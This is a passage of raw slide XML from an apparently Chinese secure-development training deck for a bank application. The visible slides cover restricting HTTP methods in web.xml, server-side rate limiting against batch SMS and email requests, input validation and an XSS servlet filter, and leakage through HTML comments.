                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>PUT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/http-method&gt;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&lt;http-method&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DELETE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/http-method&gt;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&lt;http-method&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>HEAD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/http-method&gt;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&lt;http-method&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OPTIONS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/http-method&gt;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&lt;http-method&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>TRACE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>&lt;/http-method&gt;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&lt;/web-resource-collection&gt;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&lt;auth-constraint&gt;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&lt;/auth-constraint&gt;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&lt;/security-constraint&gt;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&lt;login-config&gt;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&lt;auth-method&gt;BASIC&lt;/auth-method&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> &lt;/login-config&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>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87624" y="188640"/>
            <a:ext cx="6030912" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>批量请求攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80899" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="323528" y="90872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725" tIns="42863" rIns="85725" bIns="42863" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【规范要求】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>对同一个用户发起这类请求的频率、每小时及每天发送量在服务端做限制，不能仅仅在前端实现限制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>【释义说明】</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>业务中经常会有使用到发送短信校验码、短信通知、邮件通知等一些功能，这类请求如果不做任何限制，恶意攻击者可能进行批量恶意请求轰炸，大量短信、邮件等通知对正常用户造成困扰，同时也是对公司的资源造成损耗。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>程序中可能存在很多接口，用来查询账号是否存在、账号名与手机或邮箱、姓名等的匹配关系，这类请求如不做限制也会被恶意用户批量利用，从而获取用户数据关系相关数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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505569" y="2926611"/>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785813" y="1196752"/>
            <a:ext cx="6624637" cy="2277547"/>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安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>开发概述</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="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a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>银行应用检测项目漏洞统计</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重要及多发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞成因与防范</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平台部署与维护具体措施</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="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428625" y="1143000"/>
            <a:ext cx="8572500" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>客户端数据校验工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>脚本提供输入的校验方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>服务端数据校验工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>校验类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ReqParamUtil.java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）提供校验方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>过滤器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> Filter)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D2D8A"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>的配置实现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Servlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的过滤器机制，编写定制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XssFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>请求代理，覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>方法将参数名和参数值里的指定半角字符，强制替换成全角字符，并对危险字符进行过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50006" y="0"/>
            <a:ext cx="9043988" cy="706437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="854710" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" kern="1200" dirty="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>输入数据验证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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428625" y="1143000"/>
            <a:ext cx="8572500" cy="4770438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>源代码中会出现页面注释内容泄漏，包括开发人员名称、邮件地址等，所以在页面中针对此类注释不应该使用显式注释方式，多采用隐式注释方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以下是显式注释：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以下是隐式注释：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D2D8A"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="标题 1"/>
          <p:cNvSpPr>
